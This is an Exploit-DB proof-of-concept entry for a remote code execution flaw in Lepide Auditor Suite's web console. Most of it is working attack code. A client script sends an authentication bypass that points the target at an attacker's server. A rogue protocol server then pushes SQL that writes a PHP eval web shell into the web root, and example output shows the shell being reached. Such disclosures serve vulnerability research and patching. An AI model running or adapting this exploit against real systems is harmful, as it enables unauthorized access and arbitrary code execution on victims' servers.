Lepide Auditor Suite - 'createdb()' Web Console Database Injection Remote Code Execution

EDB-ID: 42297
Author: mr_me
Published: 2017-07-05
CVE: N/A
Type: Remote
Platform: PHP
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A

 """ 
Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution Vulnerability
Vendor: http://www.lepide.com/
File: lepideauditorsuite.zip
SHA1: 3c003200408add04308c04e3e0ae03b7774e4120
Download: http://www.lepide.com/lepideauditor/download.html
Analysis: https://www.offensive-security.com/vulndev/auditing-the-auditor/

Summary:
========

The application allows an attacker to specify a server where a custom protocol is implemented. This server performs the authentication and allows an attacker to execute controlled SQL directly against the database as root.

Additional code:
================

When I wrote this poc, I didn't combine the server and client into a single poc. So below is the client-poc.py code:

[email protected]:~# cat client-poc.py
#!/usr/bin/python
import requests
import sys

if len(sys.argv) < 3:
print "(+) usage: %s <target> <attacker's server>" % sys.argv[0]
sys.exit(-1)

target = sys.argv[1]
server = sys.argv[2]

s = requests.Session()
print "(+) sending auth bypass"
s.post('http://%s:7778/' % target, data = {'servername':server, 'username':'whateva','password':'thisisajoke!','submit':''}, allow_redirects=False)
print "(+) sending code execution request"
s.get('http://%s:7778/genratereports.php' % target, params = {'path':'lol','daterange':'[email protected]','id':'6'})

Example:
========

[email protected]:~# ./server-poc.py
Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution
by mr_me 2016

(+) waiting for the target...
(+) connected by ('172.16.175.174', 50541)
(+) got a login request
(+) got a username: test
(+) got a password: hacked
(+) sending SUCCESS packet
(+) send string successful
(+) connected by ('172.16.175.174', 50542)
(+) got a login request
(+) got a username: test
(+) got a password: hacked
(+) sending SUCCESS packet
(+) send string successful
(+) got a column request
(+) got http request id: 6
(+) got http request path: lol
(+) send string successful
(+) got a filename request
(+) got http request daterange: [email protected] - 23:59:59
(+) got http request id: 6
(+) got http request path: lol
(+) successfully sent tag
(+) successfully sent file!
(+) file sent successfully
(+) done! Remote Code Execution: http://172.16.175.174:7778/offsec.php?e=phpinfo();

In another console:

[email protected]:~# ./client-poc.py 172.16.175.174 172.16.175.1
(+) sending auth bypass
(+) sending code execution request
"""
import struct
import socket
from thread import start_new_thread
import struct

LOGIN = 601
COLUMN = 604
FILENAME = 603

VALID = 2
TAGR = 4
FILEN = 5
SUCCESS = "_SUCCESS_"

def get_string(conn):
size = struct.unpack(">i", conn.recv(4))[0]
data = conn.recv(size).decode("utf-16")
conn.send(struct.pack(">i", VALID))
return data

def send_string(conn, string):
size = len(string.encode("utf-16-le"))
conn.send(struct.pack(">i", size))
conn.send(string.encode("utf-16-le"))
return struct.unpack(">i", conn.recv(4))[0]

def send_tag(conn, tag):
conn.send(struct.pack(">i", TAGR))
conn.send(struct.pack(">i", tag))
return struct.unpack(">i", conn.recv(4))[0]

def send_file(conn, filedata):
if send_tag(conn, FILEN) == 2:
print "(+) successfully sent tag"

# send length of file
conn.send(struct.pack(">i", len(filedata.encode("utf-16-le"))))

# send the malicious payload
conn.send(filedata.encode("utf-16-le"))
if struct.unpack(">i", conn.recv(4))[0] == 2:
print "(+) successfully sent file!"
if send_tag(conn, VALID) == 2:
return True
return False

def client_thread(conn):
"""
Let's put it this way, my mum's not proud of my code.
"""
while True:
data = conn.recv(4)
if data:
resp = struct.unpack(">i", data)[0]
if resp == 4:
code = conn.recv(resp)
resp = struct.unpack(">i", code)[0]

# stage 1
if resp == LOGIN:
print "(+) got a login request"

# send a VALID response back
conn.send(struct.pack(">i", VALID))

# now we expect to get the username and password
print "(+) got a username: %s" % get_string(conn)
print "(+) got a password: %s" % get_string(conn)

# now we try to send to send a success packet
print "(+) sending SUCCESS packet"
if send_string(conn, SUCCESS) == 2:
print "(+) send string successful"

# stage 2
elif resp == COLUMN:
print "(+) got a column request"

# send a VALID response back
conn.send(struct.pack(">i", VALID))
print "(+) got http request id: %s" % get_string(conn)
print "(+) got http request path: %s" % get_string(conn)
if send_string(conn, "foo-bar") == 2:
print "(+) send string successful"

# stage 3 - this is where the exploitation is
elif resp == FILENAME:
print "(+) got a filename request"
conn.send(struct.pack(">i", VALID))

# now we read back 3 strings...
print "(+) got http request daterange: %s" % get_string(conn)
print "(+) got http request id: %s" % get_string(conn)
print "(+) got http request path: %s" % get_string(conn)

# exploit!
if send_file(conn, "select '<?php eval($_GET[e]); ?>' into outfile '../../www/offsec.php';"):
print "(+) file sent successfully"
print "(+) done! Remote Code Execution: http://%s:7778/offsec.php?e=phpinfo();" % (addr[0])
break
conn.close()

HOST = '0.0.0.0'
PORT = 1056

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((HOST, PORT))
s.listen(10)

print "Lepide Auditor Suite createdb() Web Console Database Injection Remote Code Execution"
print "by mr_me 2016\t\n"
print "(+) waiting for the target..."
while True:

# blocking call, waits to accept a connection
conn, addr = s.accept()
print '(+) connected by %s' % addr
start_new_thread(client_thread, (conn,))
s.close()

Related Posts

Comments